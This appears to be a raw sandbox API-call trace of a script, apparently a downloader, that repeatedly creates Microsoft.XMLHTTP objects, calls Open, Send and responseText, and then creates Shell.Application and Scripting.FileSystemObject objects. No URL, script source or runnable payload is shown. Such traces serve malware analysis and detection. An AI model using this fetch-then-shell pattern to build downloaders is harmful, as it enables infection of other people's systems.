	[0296.258] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0296.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0296.258] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0296.258] SysStringLen (param_1=0x0) returned 0x0
	[0296.258] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0296.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0296.258] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0296.258] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0296.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0296.258] ??2@YAPEAX_K@Z () returned 0x62f330
	[0296.258] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0296.258] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0296.258] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0296.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0296.258] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0296.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0296.259] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0296.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0296.259] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0296.259] SysStringLen (param_1=0x0) returned 0x0
	[0296.259] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0296.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0296.259] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c40) returned 0x0
	[0296.259] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0296.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0296.259] ??2@YAPEAX_K@Z () returned 0x62f310
	[0296.259] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0296.259] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0296.259] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0296.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c40) returned 0x0
	[0296.259] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c40) returned 0x3
	[0296.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0296.259] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0296.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0296.260] longjmp () 
	[0296.260] longjmp () 
	[0296.260] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0296.260] SysStringLen (param_1=0x0) returned 0x0
	[0296.260] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0296.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0296.260] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0296.260] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0296.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0296.260] ??2@YAPEAX_K@Z () returned 0x62f330
	[0296.260] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0296.260] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0296.260] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0296.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0296.260] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0296.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0296.260] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0296.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0296.261] longjmp () 
	[0296.261] longjmp () 
	[0296.261] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0296.261] SysStringLen (param_1=0x0) returned 0x0
	[0296.261] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0296.261] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0296.261] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72f0) returned 0x0
	[0296.261] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0296.261] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7358) returned 0x0
	[0296.261] ??2@YAPEAX_K@Z () returned 0x62f310
	[0296.261] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7358, pUnkSite=0x62f310) 
	[0296.261] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0296.261] XMLHTTPRequest:IUnknown:Release (This=0x49c7358) returned 0x0
	[0296.261] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72f0) returned 0x0
	[0296.261] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72f0) returned 0x3
	[0296.261] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0296.261] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0296.261] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0296.262] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0296.262] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0296.262] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0296.872] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0296.872] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0296.872] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0296.872] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0296.873] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0296.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0296.873] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0296.873] SysStringLen (param_1=0x0) returned 0x0
	[0296.873] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0296.873] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0296.873] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0296.873] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0296.873] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0296.874] ??2@YAPEAX_K@Z () returned 0x62f350
	[0296.874] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0296.874] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0296.874] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0296.874] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0296.874] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0296.874] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0296.874] SysStringLen (param_1=0x0) returned 0x0
	[0296.874] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0296.877] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0296.877] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0296.878] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0296.878] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0296.878] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0296.878] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0297.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
